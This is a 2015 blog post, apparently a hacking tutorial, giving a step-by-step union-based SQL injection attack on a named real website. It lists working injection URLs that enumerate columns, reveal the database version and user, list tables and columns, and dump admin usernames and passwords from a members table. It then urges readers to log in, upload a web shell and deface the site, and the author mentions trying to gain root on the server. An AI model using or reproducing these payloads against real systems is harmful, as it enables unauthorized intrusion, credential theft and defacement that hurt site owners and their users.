Monday, 18 May 2015

SQL INJECTION [ UNION ]


Hacking 
a vulnerable website with SQL injection allows you to obtain usernames and passwords, possibly access the admin account, and from there you could do whatever you wanted to the website really. When Anonymous hacked Sony and obtained personal information of thousands of users.. they used an advanced form of this hack. This hack can be done from any computer or device with an internet connection and a browser.
Find a vulnerable website. One way you can do this is by using what is called a google dork. In the Hacking websites section of this app, you can find a huge list of dorks. Simply goto google and type inurl:dorkhere
When you have a target URL like: http://cadaboutdrugs.ie/news.php?id=82, add a ' at the end so it looks likehttp://cadaboutdrugs.ie/news.php?id=82'
The site will be vulnerable to this hack if you get an error, or some of the websites content vanishes. If none of these things happen, this website is not vulnerable to SQLi
For the site used above, there is no error but content has vanished. It is vulnerable.
Now try for ORDER BY syntax.
http://cadaboutdrugs.ie/news.php?id=-82 ORDER BY 1--
http://cadaboutdrugs.ie/news.php?id=-82 ORDER BY 2--
http://cadaboutdrugs.ie/news.php?id=-82 ORDER BY 3--
http://cadaboutdrugs.ie/news.php?id=-82 ORDER BY 4--
I have tried upto 90 but I cant Find any Error.
Next step to Apply UNION syntax.
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1--
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,2--
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,2,3--
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,2,3,4--
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,2,3,4,5--
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,2,3,4,5,6--
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,2,3,4,5,6,7--
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,2,3,4,5,6,7,8--
Now at UNION SELECT 1,2,3,4,5,6,7,8-- you will see some vulnerable number on screen e.g. 2 3 4
Now found Version of MySQL, User, and Database Name.
http://cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,@@version,user(),database(),5,6,7,8--
Now you will see the following output :
5.1.49-log ---> MySQL Version

aboutdr_admin@web8.novara.ie ---> User

aboutdr_Test ---> Database Name
Now found All tables name in database
http://www.cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,GROUP_CONCAT(TABLE_NAME),3,4,5,6,7,8 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE()--
We got our all table -->[about,carousel,contact,documents,donate,intro,links,members,news,services] in which we got our Important table which stored admin username password is --> members
Find columns names of members table. goto http://home2.paulschou.net/tools/xlate/ website.
Copy members without quotes into [ TEXT ] field and Press
Now We got the value 109 101 109 98 101 114 115 from [ DEC / CHAR ] field.
Now our query to find column names of members table will be:
http://www.cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,GROUP_CONCAT(COLUMN_NAME),3,4,5,6,7,8 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=CHAR(109,101,109,98,101,114,115)--
Now we got all column names from members tables.-->id,username,password
Now find username password the query will be:
http://www.cadaboutdrugs.ie/news.php?id=-82 UNION SELECT 1,GROUP_CONCAT(id,0x3a,username,0x3a,password),3,4,5,6,7,8 FROM members--
Here we got id, username and password and 0x3a stands for --> [:] (colon)
Now go to Home page of site Click on Admin Login. Login with username password and Upload your shell feel free to deface or upload any page.

As always, this is for educational purposes only. Use at your own risk.

I tried this server for root but Unfortunately its patched server so It cant be rooted.


#13lackD3mOn

No comments:

Post a Comment